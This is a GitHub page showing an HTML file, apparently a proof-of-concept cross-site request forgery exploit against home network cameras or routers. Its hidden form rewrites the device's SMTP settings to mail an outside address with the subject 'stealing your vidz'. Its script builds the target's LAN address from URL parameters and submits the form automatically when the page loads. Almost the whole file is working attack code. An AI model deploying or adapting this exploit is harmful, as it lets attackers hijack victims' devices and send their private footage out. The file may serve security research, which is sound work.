-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathiframe-tplink.html
43 lines (34 loc) · 1.56 KB
/
iframe-tplink.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<html>
<body>
<form id="pwnit" action="willbereplaced/cgi-bin/CGIProxy.fcgi">
<input type="hidden" name="SMTP.MailServer1" value="192.168.1.128" />
<input type="hidden" name="SMTP.Port" value="25" />
<input type="hidden" name="SMTP.SSL" value="no" />
<input type="hidden" name="SMTP.Authentication.A0.Enabled" value="no" />
<input type="hidden" name="SMTP.Authentication.A0.UserName" value="" />
<input type="hidden" name="SMTP.Authentication.A0.Password" value="" />
<input type="hidden" name="SMTP.FromEmail" value="test@blacktraffic.co.uk" />
<input type="hidden" name="SMTP.ToMail" value="spam@blacktraffic.co.uk" />
<input type="hidden" name="SMTP.Subject" value="stealing your vidz " />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="redirect" value="asp/email.asp" />
<input type="submit" value="Submit request" />
</form>
<script>
function gup( name, url ) {
if (!url) url = location.href;
name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
var regexS = "[\\?&]"+name+"=([^&#]*)";
var regex = new RegExp( regexS );
var results = regex.exec( url );
return results == null ? null : results[1];
}
var lastOctet = gup('octet', window.location.href );
var network = gup('network', window.location.href );
var iform;
iform=document.getElementById("pwnit");
iform.action = "http://"+network+"."+lastOctet.toString()+"/cgi-bin/admin/config.cgi";
iform.submit();
</script>
</body>
</html>